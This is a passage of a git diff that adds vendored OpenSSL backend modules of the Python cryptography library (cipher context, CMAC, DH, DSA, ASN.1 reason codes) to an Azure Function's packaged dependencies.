mode else mode + ), + _Reasons.UNSUPPORTED_CIPHER, + ) + + evp_cipher = adapter(self._backend, cipher, mode) + if evp_cipher == self._backend._ffi.NULL: + msg = "cipher {0.name} ".format(cipher) + if mode is not None: + msg += "in {0.name} mode ".format(mode) + msg += ( + "is not supported by this backend (Your version of OpenSSL " + "may be too old. Current version: {}.)" + ).format(self._backend.openssl_version_text()) + raise UnsupportedAlgorithm(msg, _Reasons.UNSUPPORTED_CIPHER) + + if isinstance(mode, modes.ModeWithInitializationVector): + iv_nonce = self._backend._ffi.from_buffer( + mode.initialization_vector + ) + elif isinstance(mode, modes.ModeWithTweak): + iv_nonce = self._backend._ffi.from_buffer(mode.tweak) + elif isinstance(mode, modes.ModeWithNonce): + iv_nonce = self._backend._ffi.from_buffer(mode.nonce) + elif isinstance(cipher, algorithms.ChaCha20): + iv_nonce = self._backend._ffi.from_buffer(cipher.nonce) + else: + iv_nonce = self._backend._ffi.NULL + # begin init with cipher and operation type + res = self._backend._lib.EVP_CipherInit_ex( + ctx, + evp_cipher, + self._backend._ffi.NULL, + self._backend._ffi.NULL, + self._backend._ffi.NULL, + operation, + ) + self._backend.openssl_assert(res != 0) + # set the key length to handle variable key ciphers + res = self._backend._lib.EVP_CIPHER_CTX_set_key_length( + ctx, len(cipher.key) + ) + self._backend.openssl_assert(res != 0) + if isinstance(mode, modes.GCM): + res = self._backend._lib.EVP_CIPHER_CTX_ctrl( + ctx, + self._backend._lib.EVP_CTRL_AEAD_SET_IVLEN, + len(iv_nonce), + self._backend._ffi.NULL, + ) + self._backend.openssl_assert(res != 0) + if mode.tag is not None: + res = self._backend._lib.EVP_CIPHER_CTX_ctrl( + ctx, + self._backend._lib.EVP_CTRL_AEAD_SET_TAG, + len(mode.tag), + mode.tag, + ) + self._backend.openssl_assert(res != 0) + self._tag = mode.tag + + # pass key/iv + res = self._backend._lib.EVP_CipherInit_ex( + ctx, + self._backend._ffi.NULL, + self._backend._ffi.NULL, + self._backend._ffi.from_buffer(cipher.key), + iv_nonce, + operation, + ) + + # Check for XTS mode duplicate keys error + errors = self._backend._consume_errors() + lib = self._backend._lib + if res == 0 and ( + ( + lib.CRYPTOGRAPHY_OPENSSL_111D_OR_GREATER + and errors[0]._lib_reason_match( + lib.ERR_LIB_EVP, lib.EVP_R_XTS_DUPLICATED_KEYS + ) + ) + or ( + lib.Cryptography_HAS_PROVIDERS + and errors[0]._lib_reason_match( + lib.ERR_LIB_PROV, lib.PROV_R_XTS_DUPLICATED_KEYS + ) + ) + ): + raise ValueError("In XTS mode duplicated keys are not allowed") + + self._backend.openssl_assert(res != 0, errors=errors) + + # We purposely disable padding here as it's handled higher up in the + # API. + self._backend._lib.EVP_CIPHER_CTX_set_padding(ctx, 0) + self._ctx = ctx + + def update(self, data: bytes) -> bytes: + buf = bytearray(len(data) + self._block_size_bytes - 1) + n = self.update_into(data, buf) + return bytes(buf[:n]) + + def update_into(self, data: bytes, buf: bytes) -> int: + total_data_len = len(data) + if len(buf) < (total_data_len + self._block_size_bytes - 1): + raise ValueError( + "buffer must be at least {} bytes for this " + "payload".format(len(data) + self._block_size_bytes - 1) + ) + + data_processed = 0 + total_out = 0 + outlen = self._backend._ffi.new("int *") + baseoutbuf = self._backend._ffi.from_buffer(buf) + baseinbuf = self._backend._ffi.from_buffer(data) + + while data_processed != total_data_len: + outbuf = baseoutbuf + total_out + inbuf = baseinbuf + data_processed + inlen = min(self._MAX_CHUNK_SIZE, total_data_len - data_processed) + + res = self._backend._lib.EVP_CipherUpdate( + self._ctx, outbuf, outlen, inbuf, inlen + ) + if res == 0 and isinstance(self._mode, modes.XTS): + self._backend._consume_errors() + raise ValueError( + "In XTS mode you must supply at least a full block in the " + "first update call. For AES this is 16 bytes." + ) + else: + self._backend.openssl_assert(res != 0) + data_processed += inlen + total_out += outlen[0] + + return total_out + + def finalize(self) -> bytes: + if ( + self._operation == self._DECRYPT + and isinstance(self._mode, modes.ModeWithAuthenticationTag) + and self.tag is None + ): + raise ValueError( + "Authentication tag must be provided when decrypting." + ) + + buf = self._backend._ffi.new("unsigned char[]", self._block_size_bytes) + outlen = self._backend._ffi.new("int *") + res = self._backend._lib.EVP_CipherFinal_ex(self._ctx, buf, outlen) + if res == 0: + errors = self._backend._consume_errors() + + if not errors and isinstance(self._mode, modes.GCM): + raise InvalidTag + + lib = self._backend._lib + self._backend.openssl_assert( + errors[0]._lib_reason_match( + lib.ERR_LIB_EVP, + lib.EVP_R_DATA_NOT_MULTIPLE_OF_BLOCK_LENGTH, + ) + or ( + lib.Cryptography_HAS_PROVIDERS + and errors[0]._lib_reason_match( + lib.ERR_LIB_PROV, + lib.PROV_R_WRONG_FINAL_BLOCK_LENGTH, + ) + ) + or ( + lib.CRYPTOGRAPHY_IS_BORINGSSL + and errors[0].reason + == lib.CIPHER_R_DATA_NOT_MULTIPLE_OF_BLOCK_LENGTH + ), + errors=errors, + ) + raise ValueError( + "The length of the provided data is not a multiple of " + "the block length." + ) + + if ( + isinstance(self._mode, modes.GCM) + and self._operation == self._ENCRYPT + ): + tag_buf = self._backend._ffi.new( + "unsigned char[]", self._block_size_bytes + ) + res = self._backend._lib.EVP_CIPHER_CTX_ctrl( + self._ctx, + self._backend._lib.EVP_CTRL_AEAD_GET_TAG, + self._block_size_bytes, + tag_buf, + ) + self._backend.openssl_assert(res != 0) + self._tag = self._backend._ffi.buffer(tag_buf)[:] + + res = self._backend._lib.EVP_CIPHER_CTX_reset(self._ctx) + self._backend.openssl_assert(res == 1) + return self._backend._ffi.buffer(buf)[: outlen[0]] + + def finalize_with_tag(self, tag: bytes) -> bytes: + tag_len = len(tag) + if tag_len < self._mode._min_tag_length: + raise ValueError( + "Authentication tag must be {} bytes or longer.".format( + self._mode._min_tag_length + ) + ) + elif tag_len > self._block_size_bytes: + raise ValueError( + "Authentication tag cannot be more than {} bytes.".format( + self._block_size_bytes + ) + ) + res = self._backend._lib.EVP_CIPHER_CTX_ctrl( + self._ctx, self._backend._lib.EVP_CTRL_AEAD_SET_TAG, len(tag), tag + ) + self._backend.openssl_assert(res != 0) + self._tag = tag + return self.finalize() + + def authenticate_additional_data(self, data: bytes) -> None: + outlen = self._backend._ffi.new("int *") + res = self._backend._lib.EVP_CipherUpdate( + self._ctx, + self._backend._ffi.NULL, + outlen, + self._backend._ffi.from_buffer(data), + len(data), + ) + self._backend.openssl_assert(res != 0) + + @property + def tag(self) -> typing.Optional[bytes]: + return self._tag diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/backends/openssl/cmac.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/backends/openssl/cmac.py new file mode 100644 index 0000000..5b8699a --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/backends/openssl/cmac.py @@ -0,0 +1,87 @@ +# This file is dual licensed under the terms of the Apache License, Version +# 2.0, and the BSD License. See the LICENSE file in the root of this repository +# for complete details. + +import typing + +from cryptography.exceptions import ( + InvalidSignature, + UnsupportedAlgorithm, + _Reasons, +) +from cryptography.hazmat.primitives import constant_time +from cryptography.hazmat.primitives.ciphers.modes import CBC + +if typing.TYPE_CHECKING: + from cryptography.hazmat.primitives import ciphers + from cryptography.hazmat.backends.openssl.backend import Backend + + +class _CMACContext: + def __init__( + self, + backend: "Backend", + algorithm: "ciphers.BlockCipherAlgorithm", + ctx=None, + ) -> None: + if not backend.cmac_algorithm_supported(algorithm): + raise UnsupportedAlgorithm( + "This backend does not support CMAC.", + _Reasons.UNSUPPORTED_CIPHER, + ) + + self._backend = backend + self._key = algorithm.key + self._algorithm = algorithm + self._output_length = algorithm.block_size // 8 + + if ctx is None: + registry = self._backend._cipher_registry + adapter = registry[type(algorithm), CBC] + + evp_cipher = adapter(self._backend, algorithm, CBC) + + ctx = self._backend._lib.CMAC_CTX_new() + + self._backend.openssl_assert(ctx != self._backend._ffi.NULL) + ctx = self._backend._ffi.gc(ctx, self._backend._lib.CMAC_CTX_free) + + key_ptr = self._backend._ffi.from_buffer(self._key) + res = self._backend._lib.CMAC_Init( + ctx, + key_ptr, + len(self._key), + evp_cipher, + self._backend._ffi.NULL, + ) + self._backend.openssl_assert(res == 1) + + self._ctx = ctx + + def update(self, data: bytes) -> None: + res = self._backend._lib.CMAC_Update(self._ctx, data, len(data)) + self._backend.openssl_assert(res == 1) + + def finalize(self) -> bytes: + buf = self._backend._ffi.new("unsigned char[]", self._output_length) + length = self._backend._ffi.new("size_t *", self._output_length) + res = self._backend._lib.CMAC_Final(self._ctx, buf, length) + self._backend.openssl_assert(res == 1) + + self._ctx = None + + return self._backend._ffi.buffer(buf)[:] + + def copy(self) -> "_CMACContext": + copied_ctx = self._backend._lib.CMAC_CTX_new() + copied_ctx = self._backend._ffi.gc( + copied_ctx, self._backend._lib.CMAC_CTX_free + ) + res = self._backend._lib.CMAC_CTX_copy(copied_ctx, self._ctx) + self._backend.openssl_assert(res == 1) + return _CMACContext(self._backend, self._algorithm, ctx=copied_ctx) + + def verify(self, signature: bytes) -> None: + digest = self.finalize() + if not constant_time.bytes_eq(digest, signature): + raise InvalidSignature("Signature did not match digest.") diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/backends/openssl/decode_asn1.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/backends/openssl/decode_asn1.py new file mode 100644 index 0000000..9c6ad89 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/backends/openssl/decode_asn1.py @@ -0,0 +1,31 @@ +# This file is dual licensed under the terms of the Apache License, Version +# 2.0, and the BSD License. See the LICENSE file in the root of this repository +# for complete details. + + +from cryptography import x509 + +# CRLReason ::= ENUMERATED { +# unspecified (0), +# keyCompromise (1), +# cACompromise (2), +# affiliationChanged (3), +# superseded (4), +# cessationOfOperation (5), +# certificateHold (6), +# -- value 7 is not used +# removeFromCRL (8), +# privilegeWithdrawn (9), +# aACompromise (10) } +_CRL_ENTRY_REASON_ENUM_TO_CODE = { + x509.ReasonFlags.unspecified: 0, + x509.ReasonFlags.key_compromise: 1, + x509.ReasonFlags.ca_compromise: 2, + x509.ReasonFlags.affiliation_changed: 3, + x509.ReasonFlags.superseded: 4, + x509.ReasonFlags.cessation_of_operation: 5, + x509.ReasonFlags.certificate_hold: 6, + x509.ReasonFlags.remove_from_crl: 8, + x509.ReasonFlags.privilege_withdrawn: 9, + x509.ReasonFlags.aa_compromise: 10, +} diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/backends/openssl/dh.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/backends/openssl/dh.py new file mode 100644 index 0000000..79e3eaf --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/backends/openssl/dh.py @@ -0,0 +1,318 @@ +# This file is dual licensed under the terms of the Apache License, Version +# 2.0, and the BSD License. See the LICENSE file in the root of this repository +# for complete details. + +import typing + +from cryptography.exceptions import UnsupportedAlgorithm, _Reasons +from cryptography.hazmat.primitives import serialization +from cryptography.hazmat.primitives.asymmetric import dh + + +if typing.TYPE_CHECKING: + from cryptography.hazmat.backends.openssl.backend import Backend + + +def _dh_params_dup(dh_cdata, backend: "Backend"): + lib = backend._lib + ffi = backend._ffi + + param_cdata = lib.DHparams_dup(dh_cdata) + backend.openssl_assert(param_cdata != ffi.NULL) + param_cdata = ffi.gc(param_cdata, lib.DH_free) + if lib.CRYPTOGRAPHY_IS_LIBRESSL: + # In libressl DHparams_dup don't copy q + q = ffi.new("BIGNUM **") + lib.DH_get0_pqg(dh_cdata, ffi.NULL, q, ffi.NULL) + q_dup = lib.BN_dup(q[0]) + res = lib.DH_set0_pqg(param_cdata, ffi.NULL, q_dup, ffi.NULL) + backend.openssl_assert(res == 1) + + return param_cdata + + +def _dh_cdata_to_parameters(dh_cdata, backend: "Backend") -> "_DHParameters": + param_cdata = _dh_params_dup(dh_cdata, backend) + return _DHParameters(backend, param_cdata) + + +class _DHParameters(dh.DHParameters): + def __init__(self, backend: "Backend", dh_cdata): + self._backend = backend + self._dh_cdata = dh_cdata + + def parameter_numbers(self) -> dh.DHParameterNumbers: + p = self._backend._ffi.new("BIGNUM **") + g = self._backend._ffi.new("BIGNUM **") + q = self._backend._ffi.new("BIGNUM **") + self._backend._lib.DH_get0_pqg(self._dh_cdata, p, q, g) + self._backend.openssl_assert(p[0] != self._backend._ffi.NULL) + self._backend.openssl_assert(g[0] != self._backend._ffi.NULL) + q_val: typing.Optional[int] + if q[0] == self._backend._ffi.NULL: + q_val = None + else: + q_val = self._backend._bn_to_int(q[0]) + return dh.DHParameterNumbers( + p=self._backend._bn_to_int(p[0]), + g=self._backend._bn_to_int(g[0]), + q=q_val, + ) + + def generate_private_key(self) -> dh.DHPrivateKey: + return self._backend.generate_dh_private_key(self) + + def parameter_bytes( + self, + encoding: serialization.Encoding, + format: serialization.ParameterFormat, + ) -> bytes: + if encoding is serialization.Encoding.OpenSSH: + raise TypeError("OpenSSH encoding is not supported") + + if format is not serialization.ParameterFormat.PKCS3: + raise ValueError("Only PKCS3 serialization is supported") + + q = self._backend._ffi.new("BIGNUM **") + self._backend._lib.DH_get0_pqg( + self._dh_cdata, self._backend._ffi.NULL, q, self._backend._ffi.NULL + ) + if ( + q[0] != self._backend._ffi.NULL + and not self._backend._lib.Cryptography_HAS_EVP_PKEY_DHX + ): + raise UnsupportedAlgorithm( + "DH X9.42 serialization is not supported", + _Reasons.UNSUPPORTED_SERIALIZATION, + ) + + if encoding is serialization.Encoding.PEM: + if q[0] != self._backend._ffi.NULL: + write_bio = self._backend._lib.PEM_write_bio_DHxparams + else: + write_bio = self._backend._lib.PEM_write_bio_DHparams + elif encoding is serialization.Encoding.DER: + if q[0] != self._backend._ffi.NULL: + write_bio = self._backend._lib.Cryptography_i2d_DHxparams_bio + else: + write_bio = self._backend._lib.i2d_DHparams_bio + else: + raise TypeError("encoding must be an item from the Encoding enum") + + bio = self._backend._create_mem_bio_gc() + res = write_bio(bio, self._dh_cdata) + self._backend.openssl_assert(res == 1) + return self._backend._read_mem_bio(bio) + + +def _get_dh_num_bits(backend, dh_cdata) -> int: + p = backend._ffi.new("BIGNUM **") + backend._lib.DH_get0_pqg(dh_cdata, p, backend._ffi.NULL, backend._ffi.NULL) + backend.openssl_assert(p[0] != backend._ffi.NULL) + return backend._lib.BN_num_bits(p[0]) + + +class _DHPrivateKey(dh.DHPrivateKey): + def __init__(self, backend: "Backend", dh_cdata, evp_pkey): + self._backend = backend + self._dh_cdata = dh_cdata + self._evp_pkey = evp_pkey + self._key_size_bytes = self._backend._lib.DH_size(dh_cdata) + + @property + def key_size(self) -> int: + return _get_dh_num_bits(self._backend, self._dh_cdata) + + def private_numbers(self) -> dh.DHPrivateNumbers: + p = self._backend._ffi.new("BIGNUM **") + g = self._backend._ffi.new("BIGNUM **") + q = self._backend._ffi.new("BIGNUM **") + self._backend._lib.DH_get0_pqg(self._dh_cdata, p, q, g) + self._backend.openssl_assert(p[0] != self._backend._ffi.NULL) + self._backend.openssl_assert(g[0] != self._backend._ffi.NULL) + if q[0] == self._backend._ffi.NULL: + q_val = None + else: + q_val = self._backend._bn_to_int(q[0]) + pub_key = self._backend._ffi.new("BIGNUM **") + priv_key = self._backend._ffi.new("BIGNUM **") + self._backend._lib.DH_get0_key(self._dh_cdata, pub_key, priv_key) + self._backend.openssl_assert(pub_key[0] != self._backend._ffi.NULL) + self._backend.openssl_assert(priv_key[0] != self._backend._ffi.NULL) + return dh.DHPrivateNumbers( + public_numbers=dh.DHPublicNumbers( + parameter_numbers=dh.DHParameterNumbers( + p=self._backend._bn_to_int(p[0]), + g=self._backend._bn_to_int(g[0]), + q=q_val, + ), + y=self._backend._bn_to_int(pub_key[0]), + ), + x=self._backend._bn_to_int(priv_key[0]), + ) + + def exchange(self, peer_public_key: dh.DHPublicKey) -> bytes: + if not isinstance(peer_public_key, _DHPublicKey): + raise TypeError("peer_public_key must be a DHPublicKey") + + ctx = self._backend._lib.EVP_PKEY_CTX_new( + self._evp_pkey, self._backend._ffi.NULL + ) + self._backend.openssl_assert(ctx != self._backend._ffi.NULL) + ctx = self._backend._ffi.gc(ctx, self._backend._lib.EVP_PKEY_CTX_free) + res = self._backend._lib.EVP_PKEY_derive_init(ctx) + self._backend.openssl_assert(res == 1) + res = self._backend._lib.EVP_PKEY_derive_set_peer( + ctx, peer_public_key._evp_pkey + ) + # Invalid kex errors here in OpenSSL 3.0 because checks were moved + # to EVP_PKEY_derive_set_peer + self._exchange_assert(res == 1) + keylen = self._backend._ffi.new("size_t *") + res = self._backend._lib.EVP_PKEY_derive( + ctx, self._backend._ffi.NULL, keylen + ) + # Invalid kex errors here in OpenSSL < 3 + self._exchange_assert(res == 1) + self._backend.openssl_assert(keylen[0] > 0) + buf = self._backend._ffi.new("unsigned char[]", keylen[0]) + res = self._backend._lib.EVP_PKEY_derive(ctx, buf, keylen) + self._backend.openssl_assert(res == 1) + + key = self._backend._ffi.buffer(buf, keylen[0])[:] + pad = self._key_size_bytes - len(key) + + if pad > 0: + key = (b"\x00" * pad) + key + + return key + + def _exchange_assert(self, ok: bool) -> None: + if not ok: + errors_with_text = self._backend._consume_errors_with_text() + raise ValueError( + "Error computing shared key.", + errors_with_text, + ) + + def public_key(self) -> dh.DHPublicKey: + dh_cdata = _dh_params_dup(self._dh_cdata, self._backend) + pub_key = self._backend._ffi.new("BIGNUM **") + self._backend._lib.DH_get0_key( + self._dh_cdata, pub_key, self._backend._ffi.NULL + ) + self._backend.openssl_assert(pub_key[0] != self._backend._ffi.NULL) + pub_key_dup = self._backend._lib.BN_dup(pub_key[0]) + self._backend.openssl_assert(pub_key_dup != self._backend._ffi.NULL) + + res = self._backend._lib.DH_set0_key( + dh_cdata, pub_key_dup, self._backend._ffi.NULL + ) + self._backend.openssl_assert(res == 1) + evp_pkey = self._backend._dh_cdata_to_evp_pkey(dh_cdata) + return _DHPublicKey(self._backend, dh_cdata, evp_pkey) + + def parameters(self) -> dh.DHParameters: + return _dh_cdata_to_parameters(self._dh_cdata, self._backend) + + def private_bytes( + self, + encoding: serialization.Encoding, + format: serialization.PrivateFormat, + encryption_algorithm: serialization.KeySerializationEncryption, + ) -> bytes: + if format is not serialization.PrivateFormat.PKCS8: + raise ValueError( + "DH private keys support only PKCS8 serialization" + ) + if not self._backend._lib.Cryptography_HAS_EVP_PKEY_DHX: + q = self._backend._ffi.new("BIGNUM **") + self._backend._lib.DH_get0_pqg( + self._dh_cdata, + self._backend._ffi.NULL, + q, + self._backend._ffi.NULL, + ) + if q[0] != self._backend._ffi.NULL: + raise UnsupportedAlgorithm( + "DH X9.42 serialization is not supported", + _Reasons.UNSUPPORTED_SERIALIZATION, + ) + + return self._backend._private_key_bytes( + encoding, + format, + encryption_algorithm, + self, + self._evp_pkey, + self._dh_cdata, + ) + + +class _DHPublicKey(dh.DHPublicKey): + def __init__(self, backend: "Backend", dh_cdata, evp_pkey): + self._backend = backend + self._dh_cdata = dh_cdata + self._evp_pkey = evp_pkey + self._key_size_bits = _get_dh_num_bits(self._backend, self._dh_cdata) + + @property + def key_size(self) -> int: + return self._key_size_bits + + def public_numbers(self) -> dh.DHPublicNumbers: + p = self._backend._ffi.new("BIGNUM **") + g = self._backend._ffi.new("BIGNUM **") + q = self._backend._ffi.new("BIGNUM **") + self._backend._lib.DH_get0_pqg(self._dh_cdata, p, q, g) + self._backend.openssl_assert(p[0] != self._backend._ffi.NULL) + self._backend.openssl_assert(g[0] != self._backend._ffi.NULL) + if q[0] == self._backend._ffi.NULL: + q_val = None + else: + q_val = self._backend._bn_to_int(q[0]) + pub_key = self._backend._ffi.new("BIGNUM **") + self._backend._lib.DH_get0_key( + self._dh_cdata, pub_key, self._backend._ffi.NULL + ) + self._backend.openssl_assert(pub_key[0] != self._backend._ffi.NULL) + return dh.DHPublicNumbers( + parameter_numbers=dh.DHParameterNumbers( + p=self._backend._bn_to_int(p[0]), + g=self._backend._bn_to_int(g[0]), + q=q_val, + ), + y=self._backend._bn_to_int(pub_key[0]), + ) + + def parameters(self) -> dh.DHParameters: + return _dh_cdata_to_parameters(self._dh_cdata, self._backend) + + def public_bytes( + self, + encoding: serialization.Encoding, + format: serialization.PublicFormat, + ) -> bytes: + if format is not serialization.PublicFormat.SubjectPublicKeyInfo: + raise ValueError( + "DH public keys support only " + "SubjectPublicKeyInfo serialization" + ) + + if not self._backend._lib.Cryptography_HAS_EVP_PKEY_DHX: + q = self._backend._ffi.new("BIGNUM **") + self._backend._lib.DH_get0_pqg( + self._dh_cdata, + self._backend._ffi.NULL, + q, + self._backend._ffi.NULL, + ) + if q[0] != self._backend._ffi.NULL: + raise UnsupportedAlgorithm( + "DH X9.42 serialization is not supported", + _Reasons.UNSUPPORTED_SERIALIZATION, + ) + + return self._backend._public_key_bytes( + encoding, format, self, self._evp_pkey, None + ) diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/backends/openssl/dsa.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/backends/openssl/dsa.py new file mode 100644 index 0000000..1c212f0 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/backends/openssl/dsa.py @@ -0,0 +1,239 @@ +# This file is dual licensed under the terms of the Apache License, Version +# 2.0, and the BSD License. See the LICENSE file in the root of this repository +# for complete details. + + +import typing + +from cryptography.exceptions import InvalidSignature +from cryptography.hazmat.backends.openssl.utils import ( + _calculate_digest_and_algorithm, +) +from cryptography.hazmat.primitives import hashes, serialization +from cryptography.hazmat.primitives.asymmetric import ( + dsa, + utils as asym_utils, +) + + +if typing.TYPE_CHECKING: + from cryptography.hazmat.backends.openssl.backend import Backend + + +def _dsa_sig_sign( + backend: "Backend", private_key: "_DSAPrivateKey", data: bytes +) -> bytes: + sig_buf_len = backend._lib.DSA_size(private_key._dsa_cdata) + sig_buf = backend._ffi.new("unsigned char[]", sig_buf_len) + buflen = backend._ffi.new("unsigned int *") + + # The first parameter passed to DSA_sign is unused by OpenSSL but + # must be an integer. + res = backend._lib.DSA_sign( + 0, data, len(data), sig_buf, buflen, private_key._dsa_cdata + ) + backend.openssl_assert(res == 1) + backend.openssl_assert(buflen[0]) + + return backend._ffi.buffer(sig_buf)[: buflen[0]] + + +def _dsa_sig_verify( + backend: "Backend", + public_key: "_DSAPublicKey", + signature: bytes, + data: bytes, +) -> None: + # The first parameter passed to DSA_verify is unused by OpenSSL but + # must be an integer. + res = backend._lib.DSA_verify( + 0, data, len(data), signature, len(signature), public_key._dsa_cdata + ) + + if res != 1: + backend._consume_errors() + raise InvalidSignature + + +class _DSAParameters(dsa.DSAParameters): + def __init__(self, backend: "Backend", dsa_cdata): + self._backend = backend + self._dsa_cdata = dsa_cdata + + def parameter_numbers(self) -> dsa.DSAParameterNumbers: + p = self._backend._ffi.new("BIGNUM **") + q = self._backend._ffi.new("BIGNUM **") + g = self._backend._ffi.new("BIGNUM **") + self._backend._lib.DSA_get0_pqg(self._dsa_cdata, p, q, g) + self._backend.openssl_assert(p[0] != self._backend._ffi.NULL) + self._backend.openssl_assert(q[0] != self._backend._ffi.NULL) + self._backend.openssl_assert(g[0] != self._backend._ffi.NULL) + return dsa.DSAParameterNumbers( + p=self._backend._bn_to_int(p[0]), + q=self._backend._bn_to_int(q[0]), + g=self._backend._bn_to_int(g[0]), + ) + + def generate_private_key(self) -> dsa.DSAPrivateKey: + return self._backend.generate_dsa_private_key(self) + + +class _DSAPrivateKey(dsa.DSAPrivateKey): + _key_size: int + + def __init__(self, backend: "Backend", dsa_cdata, evp_pkey): + self._backend = backend + self._dsa_cdata = dsa_cdata + self._evp_pkey = evp_pkey + + p = self._backend._ffi.new("BIGNUM **") + self._backend._lib.DSA_get0_pqg( + dsa_cdata, p, self._backend._ffi.NULL, self._backend._ffi.NULL + ) + self._backend.openssl_assert(p[0] != backend._ffi.NULL) + self._key_size = self._backend._lib.BN_num_bits(p[0]) + + @property + def key_size(self) -> int: + return self._key_size + + def private_numbers(self) -> dsa.DSAPrivateNumbers: + p = self._backend._ffi.new("BIGNUM **") + q = self._backend._ffi.new("BIGNUM **") + g = self._backend._ffi.new("BIGNUM **") + pub_key = self._backend._ffi.new("BIGNUM **") + priv_key = self._backend._ffi.new("BIGNUM **") + self._backend._lib.DSA_get0_pqg(self._dsa_cdata, p, q, g) + self._backend.openssl_assert(p[0] != self._backend._ffi.NULL) + self._backend.openssl_assert(q[0] != self._backend._ffi.NULL) + self._backend.openssl_assert(g[0] != self._backend._ffi.NULL) + self._backend._lib.DSA_get0_key(self._dsa_cdata, pub_key, priv_key) + self._backend.openssl_assert(pub_key[0] != self._backend._ffi.NULL) + self._backend.openssl_assert(priv_key[0] != self._backend._ffi.NULL) + return dsa.DSAPrivateNumbers( + public_numbers=dsa.DSAPublicNumbers( + parameter_numbers=dsa.DSAParameterNumbers( + p=self._backend._bn_to_int(p[0]), + q=self._backend._bn_to_int(q[0]), + g=self._backend._bn_to_int(g[0]), + ), + y=self._backend._bn_to_int(pub_key[0]), + ), + x=self._backend._bn_to_int(priv_key[0]), + ) + + def public_key(self) -> dsa.DSAPublicKey: + dsa_cdata = self._backend._lib.DSAparams_dup(self._dsa_cdata) + self._backend.openssl_assert(dsa_cdata != self._backend._ffi.NULL) + dsa_cdata = self._backend._ffi.gc( + dsa_cdata, self._backend._lib.DSA_free + ) + pub_key = self._backend._ffi.new("BIGNUM **") + self._backend._lib.DSA_get0_key( + self._dsa_cdata, pub_key, self._backend._ffi.NULL + ) + self._backend.openssl_assert(pub_key[0] != self._backend._ffi.NULL) + pub_key_dup = self._backend._lib.BN_dup(pub_key[0]) + res = self._backend._lib.DSA_set0_key( + dsa_cdata, pub_key_dup, self._backend._ffi.NULL + ) + self._backend.openssl_assert(res == 1) + evp_pkey = self._backend._dsa_cdata_to_evp_pkey(dsa_cdata) + return _DSAPublicKey(self._backend, dsa_cdata, evp_pkey) + + def parameters(self) -> dsa.DSAParameters: + dsa_cdata = self._backend._lib.DSAparams_dup(self._dsa_cdata) + self._backend.openssl_assert(dsa_cdata != self._backend._ffi.NULL) + dsa_cdata = self._backend._ffi.gc( + dsa_cdata, self._backend._lib.DSA_free + ) + return _DSAParameters(self._backend, dsa_cdata) + + def private_bytes( + self, + encoding: serialization.Encoding, + format: serialization.PrivateFormat, + encryption_algorithm: serialization.KeySerializationEncryption, + ) -> bytes: + return self._backend._private_key_bytes( + encoding, + format, + encryption_algorithm, + self, + self._evp_pkey, + self._dsa_cdata, + ) + + def sign( + self, + data: bytes, + algorithm: typing.Union[asym_utils.Prehashed, hashes.HashAlgorithm], + ) -> bytes: + data, _ = _calculate_digest_and_algorithm(data, algorithm) + return _dsa_sig_sign(self._backend, self, data) + + +class _DSAPublicKey(dsa.DSAPublicKey): + _key_size: int + + def __init__(self, backend: "Backend", dsa_cdata, evp_pkey): + self._backend = backend + self._dsa_cdata = dsa_cdata + self._evp_pkey = evp_pkey + p = self._backend._ffi.new("BIGNUM **") + self._backend._lib.DSA_get0_pqg( + dsa_cdata, p, self._backend._ffi.NULL, self._backend._ffi.NULL + ) + self._backend.openssl_assert(p[0] != backend._ffi.NULL) + self._key_size = self._backend._lib.BN_num_bits(p[0]) + + @property + def key_size(self) -> int: + return self._key_size + + def public_numbers(self) -> dsa.DSAPublicNumbers: + p = self._backend._ffi.new("BIGNUM **") + q = self._backend._ffi.new("BIGNUM **") + g = self._backend._ffi.new("BIGNUM **") + pub_key = self._backend._ffi.new("BIGNUM **") + self._backend._lib.DSA_get0_pqg(self._dsa_cdata, p, q, g) + self._backend.openssl_assert(p[0] != self._backend._ffi.NULL) + self._backend.openssl_assert(q[0] != self._backend._ffi.NULL) + self._backend.openssl_assert(g[0] != self._backend._ffi.NULL) + self._backend._lib.DSA_get0_key( + self._dsa_cdata, pub_key, self._backend._ffi.NULL + ) + self._backend.openssl_assert(pub_key[0] != self._backend._ffi.NULL) + return dsa.DSAPublicNumbers( + parameter_numbers=dsa.DSAParameterNumbers( + p=self._backend._bn_to_int(p[0]), + q=self._backend._bn_to_int(q[0]), + g=self._backend._bn_to_int(g[0]), + ), + y=self._backend._bn_to_int(pub_key[0]), + ) + + def parameters(self) -> dsa.DSAParameters: + dsa_cdata = self._backend._lib.DSAparams_dup(self._dsa_cdata) + dsa_cdata = self._backend._ffi.gc( + dsa_cdata, self._backend._lib.DSA_free + ) + return _DSAParameters(self._backend, dsa_cdata) + + def public_bytes( + self, + encoding: serialization.Encoding, + format: serialization.PublicFormat, + ) -> bytes: + return self._backend._public_key_bytes( + encoding, format, self, self._evp_pkey, None + ) + + def verify( + self, + signature: bytes, + data: bytes, + algorithm: typing.Union[asym_utils.Prehashed, hashes.HashAlgorithm], + ) -> None: + data, _ = _calculate_digest_and_algorithm(data, algorithm) + return _dsa_sig_verify(self._backend, self, signature, data) diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/backends/openssl/ec.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/backends/openssl/ec.py new file mode 100644 index 0000000..bc095cb --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/backends/openssl/ec.py @@ -0,0 +1,315 @@ +# This file is dual licensed under the terms of the Apache License, Version +# 2.0, and the BSD License. See the LICENSE file in the root of this repository +# for complete details. + +import typing + +from cryptography.exceptions import ( + InvalidSignature, + 